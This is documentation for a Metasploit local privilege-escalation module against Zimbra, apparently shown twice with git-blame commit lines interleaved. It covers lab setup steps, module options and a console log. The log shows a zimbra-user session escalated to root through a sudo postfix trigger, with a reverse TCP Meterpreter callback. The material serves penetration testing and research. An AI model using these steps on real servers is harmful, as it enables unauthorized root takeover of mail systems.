documentation/modules/exploit/linux/local/zimbra_postfix_priv_esc.md

## Vulnerable Application

Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably
they'll patch it eventually - I reported it to Zimbra.

### Install Zimbra

My steps to install Zimbra (adapted from Christophe):

Create a VM with the following specs:

```
HDD = 128gb
Memory/etc don't matter
```

Install a local DNS server (note: replace `<ip>` with the host's actual ip)
(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):

```
sudo apt update && sudo apt install dnsmasq
sudo hostnamectl set-hostname mail.example.org
echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
```

Configure the host to use it:

```
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo killall dnsmasq # Seems to be required for Red Hat OSes
sudo systemctl restart dnsmasq
echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
```

Download Zimbra from
https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
have to sell your soul and opt-in to spam, but they don't validate your email.

```
tar -xvvzf zcs-*.tgz
cd zcs*
sudo ./install.sh

* Lots of <enter>
* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
* Yes change the system
* Setup the admin password, probably turn off auto-updates
```

## Verification Steps

Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used
`exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter
binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)`
then reboot.

From there,

You can obviously get a shell however you like. :)

Then:

1. Do: `use exploit/linux/local/zimbra_postfix_priv_esc`
1. Do: `set SESSION 1`
1. Do: `set RHOSTS <target>`
1. Do: `set LHOST <listenerip>`
1. Do: `exploit`

## Options

### SUDO_PATH

The path to `sudo` on the host. If we have a proper environment with `$PATH`
set, which we generally do, simply `sudo` is fine.

### ZIMBRA_BASE

The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`,
and I'm not even sure if it _can_ install elsewhere, so this default should be
fine.

### WritableDir

A directory where we can write the payload - by default, `/tmp`.

### PayloadFilename

A specific filename to use as the payload, within `WritableDir`. By default,
it's randomized (with a `.` in front)

## Scenarios

### Escalating a `zimbra` session to `root`, after exploiting cve-2022-41352

```
msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                Connection
  --  ----  ----                   -----------                ----------
  1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)

msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit

[*] Started reverse TCP handler on 172.16.166.147:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending stage (3045348 bytes) to 172.16.166.157
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.GPjXSraCDY
[*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
[*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
[*] Sending stage (3045348 bytes) to 172.16.166.157
[+] Deleted /tmp/.GPjXSraCDY
[*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700

meterpreter > getuid
Server username: root
```
Check in zimbra_postfix_priv_esc.rb 2022-10-14 13:21:41 -07:00			`## Vulnerable Application`

			`Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably`
			`they'll patch it eventually - I reported it to Zimbra.`

Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00			`### Install Zimbra`

			`My steps to install Zimbra (adapted from Christophe):`

			`Create a VM with the following specs:`

			```
			`HDD = 128gb`
			`Memory/etc don't matter`
			```

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			Install a local DNS server (note: replace `<ip>` with the host's actual ip)
			(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			```
			`sudo apt update && sudo apt install dnsmasq`
			`sudo hostnamectl set-hostname mail.example.org`
			`echo "<ip> mail.example.org" \| sudo tee -a /etc/hosts`
			`echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' \| sudo tee /etc/dnsmasq.conf`
			```

			`Configure the host to use it:`

			```
			`sudo systemctl disable systemd-resolved`
			`sudo systemctl stop systemd-resolved`
			`sudo killall dnsmasq # Seems to be required for Red Hat OSes`
			`sudo systemctl restart dnsmasq`
			`echo "nameserver 127.0.0.1" \| sudo tee /etc/resolv.conf`
			```

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			`Download Zimbra from`
			`https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll`
			`have to sell your soul and opt-in to spam, but they don't validate your email.`
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			```
			`tar -xvvzf zcs-*.tgz`
			`cd zcs*`
			`sudo ./install.sh`

			`* Lots of <enter>`
			* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
			`* Yes change the system`
			`* Setup the admin password, probably turn off auto-updates`
			```

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			`## Verification Steps`
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used
			`exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter
			binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)`
			`then reboot.`

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			`From there,`
Check in zimbra_postfix_priv_esc.rb 2022-10-14 13:21:41 -07:00
			`You can obviously get a shell however you like. :)`

			`Then:`

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			1. Do: `use exploit/linux/local/zimbra_postfix_priv_esc`
			1. Do: `set SESSION 1`
			1. Do: `set RHOSTS <target>`
			1. Do: `set LHOST <listenerip>`
			1. Do: `exploit`
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			`## Options`

			`### SUDO_PATH`

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			The path to `sudo` on the host. If we have a proper environment with `$PATH`
			set, which we generally do, simply `sudo` is fine.
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			`### ZIMBRA_BASE`

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`,
			`and I'm not even sure if it _can_ install elsewhere, so this default should be`
			`fine.`
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			`### WritableDir`

			A directory where we can write the payload - by default, `/tmp`.

			`### PayloadFilename`

Documentation fix to follow the template 2022-10-18 16:09:57 +02:00			A specific filename to use as the payload, within `WritableDir`. By default,
			it's randomized (with a `.` in front)
Resolve feedback - get rid of unnecessary directory, add CVE number, let the user choose the path 2022-10-17 15:00:56 -07:00
			`## Scenarios`

			### Escalating a `zimbra` session to `root`, after exploiting cve-2022-41352

Check in zimbra_postfix_priv_esc.rb 2022-10-14 13:21:41 -07:00			```
			`msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`1 meterpreter x64/linux zimbra @ mail.example.org 172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)`

			`msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc`
			`[*] Using configured payload linux/x64/meterpreter/reverse_tcp`
			`msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1`
			`SESSION => 1`
			`msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit`

			`[*] Started reverse TCP handler on 172.16.166.147:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Sending stage (3045348 bytes) to 172.16.166.157`
			`[*] Executing: sudo -n -l`
			`[+] The target appears to be vulnerable.`
			`[*] Creating exploit directory: /tmp/.GPjXSraCDY`
			`[*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...`
			`[*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8`
			`[*] Sending stage (3045348 bytes) to 172.16.166.157`
			`[+] Deleted /tmp/.GPjXSraCDY`
			`[*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700`

			`meterpreter > getuid`
			`Server username: root`
			```